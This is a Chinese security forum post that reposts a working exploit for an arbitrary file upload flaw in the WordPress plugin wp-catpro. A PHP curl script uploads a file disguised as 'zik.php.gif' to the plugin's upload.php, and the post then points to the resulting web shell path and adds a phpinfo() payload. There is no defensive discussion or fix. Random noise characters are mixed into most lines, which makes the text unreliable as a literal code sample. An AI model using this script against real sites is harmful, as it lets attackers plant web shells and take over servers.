找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2066|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
+ }/ T  E) J* Q#-----------------------------------------------------------------------: T* B+ V9 P' r) t" I
6 d! |% t5 w) X5 ?2 Y( m5 f4 S
作者  => Zikou-16
8 h$ s0 w& S3 t邮箱 => zikou16x@gmail.com
7 h) M% X* p9 N测试系统 : Windows 7 , Backtrack 5r3
2 d" h! {% A1 l. {0 }( u' ]下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip; D: v# o7 R# [9 H
####7 y6 x9 g% c4 x

* E8 u1 k% `4 ~  |! q9 A& d#=> Exploit 信息:8 K2 r0 y9 l+ Y8 x5 J3 Q
------------------
; P% f' D4 U7 ^6 o+ T# 攻击者可以上传 file/shell.php.gif4 p0 \, T; t/ ]8 c( H/ l* J
# ("jpg", "gif", "png")  // Allowed file extensions, N7 v; y. U# M* T; |" T
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)' P; Q4 a1 Q, ~- Z) B8 K" F0 j& l
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)) A  Q8 u2 `9 Z% e) ?
------------------
& r/ s- ]# l% W" P3 |4 s* S & E- e6 ~8 ]9 D( o) \/ s
#=> Exploit
* V8 O1 F2 R$ \* M4 T4 Z  Z-----------* z' ^$ n" [2 ~1 v
<?php
8 I' m. }' s0 i! q5 f 3 v. c, C9 ?4 H# s, h& e
$uploadfile="zik.php.gif";
& h: _" j! x8 _8 O- l$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");9 ~! a  V; O: W, B! }) v0 _" r
curl_setopt($ch, CURLOPT_POST, true);
) G* d: @) ?: x6 i, w; S7 f2 O+ q/ Vcurl_setopt($ch, CURLOPT_POSTFIELDS,
9 s) K( A9 N0 Y2 Y6 karray('Filedata'=>"@$uploadfile"," a! a, c, y% _- H7 W& {
'folder'=>'/wp-content/uploads/catpro/'));2 u# f7 h; `- y
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);# y& T0 X, g$ j! R
$postResult = curl_exec($ch);
# M4 Z* Q: M8 }2 V) T% L0 n0 [+ N) Jcurl_close($ch);: X: m( S# h3 N/ c4 l

, o7 ]. [- J. d% v% w5 o1 D, w  \+ zprint "$postResult";
' o9 `' h5 ?* `0 k2 {4 e3 ~2 b( O 6 ?; z( Z5 a4 O2 `0 e7 n# ~& w
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif8 z  O6 ~, |1 @# a1 q, P
  ?>
' E5 v$ W5 |& B1 J- s) `$ P<?php* J! J5 [# Q, L4 }" X
phpinfo();  n) A9 X# c+ ^* A# X& K; O
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表